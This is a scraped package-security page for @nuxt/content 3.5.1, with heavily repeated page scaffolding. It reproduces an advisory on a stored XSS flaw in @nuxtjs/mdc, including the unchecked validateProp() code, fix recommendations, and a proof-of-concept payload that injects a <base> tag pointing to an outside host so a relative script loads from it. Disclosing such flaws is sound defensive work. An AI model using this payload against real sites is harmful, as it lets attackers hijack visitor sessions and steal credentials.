Version Details and Security Vulnerabilities

📦

@nuxt/content

3.5.1

Comparision Betweeen 3.5.1 and 3.5.0

Identify the differences between the current version of the package and the previous one.

Version

Dependencies

Dev Dependencies

Peer Dependencies

Distributed Files

Unpacked Size

339.44 KB

339.25 KB

Security Vulnerabilities

This site is an independent open-source project and is not affiliated with, endorsed by, or sponsored by npm, Inc. or GitHub, Inc. The name “npm” is a registered trademark of npm, Inc., used here solely to describe compatibility and reference publicly available npm package data.

Version Details and Security Vulnerabilities

📦

@nuxt/content

3.5.1

Comparision Betweeen 3.5.1 and 3.5.0

Identify the differences between the current version of the package and the previous one.

Version

Dependencies

Dev Dependencies

Peer Dependencies

Distributed Files

Unpacked Size

339.44 KB

339.25 KB

Security Vulnerabilities

Security Details

Comprehensive list of direct or transitive vulnerabilities for version 3.5.1 of the package @nuxt/content.

All Security Vulnerabilities

All the vulnerabilities related to the version 3.5.1 of the package

Summary:

Nuxt MDC has an XSS vulnerability in markdown rendering that bypasses HTML filtering

Details:

Summary

A remote script-inclusion / stored XSS vulnerability in @nuxtjs/mdc lets a Markdown author inject a <base href="https://attacker.tld"> element.
The <base> tag rewrites how all subsequent relative URLs are resolved, so an attacker can make the page load scripts, styles, or images from an external, attacker-controlled origin and execute arbitrary JavaScript in the site’s context.

Details

Affected file : src/runtime/parser/utils/props.ts
Core logic : validateProp() inspects
- attributes that start with on → blocked
- href or src → filtered by isAnchorLinkAllowed()
  Every other attribute and every tag (including <base>) is allowed unchanged, so the malicious href on <base> is never validated.

export const validateProp = (attribute: string, value: string) => {
  if (attribute.startsWith('on')) return false
  if (attribute === 'href' || attribute === 'src') {
    return isAnchorLinkAllowed(value)
  }
  return true               // ← “href” on <base> not checked
}

As soon as <base href="https://vozec.fr"> is parsed, any later relative path—/script.js, ../img.png, etc.—is fetched from the attacker’s domain.

Proof of Concept

Place the following in any Markdown handled by Nuxt MDC:

<base href="https://vozec.fr">
<script src="/xss.js"></script>

Start the Nuxt app (npm run dev).
Visit the page.
The browser requests https://vozec.fr/xss.js, and whatever JavaScript it returns runs under the vulnerable site’s origin (unless CSP blocks it).

Impact

Type: Stored XSS via remote script inclusion
Affected apps: Any Nuxt project using @nuxtjs/mdc to render user-controlled Markdown (blogs, CMSs, docs, comments…).
Consequences: Full takeover of visitor sessions, credential theft, defacement, phishing, CSRF, or any action executable via injected scripts.

Recommendations

Disallow or sanitize <base> tags in the renderer. The safest fix is to strip them entirely.
Alternatively, restrict href on <base> to same-origin URLs and refuse protocols like http:, https:, data:, etc. that do not match the current site origin.
Publish a patched release and document the security fix.
Until patched, disable raw HTML in Markdown or use an external sanitizer (e.g., DOMPurify) with FORBID_TAGS: ['base'].

Details about @nuxtjs/mdc@0.17.0

Security Details

Comprehensive list of direct or transitive vulnerabilities for version 3.5.1 of the package @nuxt/content.

All Security Vulnerabilities

All the vulnerabilities related to the version 3.5.1 of the package

Summary:

Nuxt MDC has an XSS vulnerability in markdown rendering that bypasses HTML filtering

Details:

Summary

Details

Affected file : src/runtime/parser/utils/props.ts
Core logic : validateProp() inspects
- attributes that start with on → blocked
- href or src → filtered by isAnchorLinkAllowed()
  Every other attribute and every tag (including <base>) is allowed unchanged, so the malicious href on <base> is never validated.

export const validateProp = (attribute: string, value: string) => {
  if (attribute.startsWith('on')) return false
  if (attribute === 'href' || attribute === 'src') {
    return isAnchorLinkAllowed(value)
  }
  return true               // ← “href” on <base> not checked
}

As soon as <base href="https://vozec.fr"> is parsed, any later relative path—/script.js, ../img.png, etc.—is fetched from the attacker’s domain.

Proof of Concept

Place the following in any Markdown handled by Nuxt MDC:

<base href="https://vozec.fr">
<script src="/xss.js"></script>

Start the Nuxt app (npm run dev).
Visit the page.
The browser requests https://vozec.fr/xss.js, and whatever JavaScript it returns runs under the vulnerable site’s origin (unless CSP blocks it).

Impact

Type: Stored XSS via remote script inclusion
Affected apps: Any Nuxt project using @nuxtjs/mdc to render user-controlled Markdown (blogs, CMSs, docs, comments…).
Consequences: Full takeover of visitor sessions, credential theft, defacement, phishing, CSRF, or any action executable via injected scripts.

Recommendations

Disallow or sanitize <base> tags in the renderer. The safest fix is to strip them entirely.
Alternatively, restrict href on <base> to same-origin URLs and refuse protocols like http:, https:, data:, etc. that do not match the current site origin.
Publish a patched release and document the security fix.
Until patched, disable raw HTML in Markdown or use an external sanitizer (e.g., DOMPurify) with FORBID_TAGS: ['base'].

Details about @nuxtjs/mdc@0.17.0

Version Details and Security Vulnerabilities

@nuxt/content

Comparision Betweeen 3.5.1 and 3.5.0

Security Vulnerabilities

Version Details and Security Vulnerabilities

@nuxt/content

Comparision Betweeen 3.5.1 and 3.5.0

Security Vulnerabilities

Security Details

All

Transitive Dependencies

Package

All Security Vulnerabilities

Summary

Details

Proof of Concept

Impact

Recommendations

Security Details

All

Transitive Dependencies

Package

All Security Vulnerabilities

Summary

Details

Proof of Concept

Impact

Recommendations

Version Details and Security Vulnerabilities

@nuxt/content

Comparision Betweeen 3.5.1 and 3.5.0

Security Vulnerabilities

Version Details and Security Vulnerabilities

@nuxt/content

Comparision Betweeen 3.5.1 and 3.5.0

Security Vulnerabilities

Security Details

All

Transitive Dependencies

Package

All Security Vulnerabilities

@nuxtjs/mdc@0.17.0 GHSA-cj6r-rrr9-fg82 8.3

Summary

Details

Proof of Concept

Impact

Recommendations

Security Details

All

Transitive Dependencies

Package

All Security Vulnerabilities

@nuxtjs/mdc@0.17.0 GHSA-cj6r-rrr9-fg82 8.3

Summary

Details

Proof of Concept

Impact

Recommendations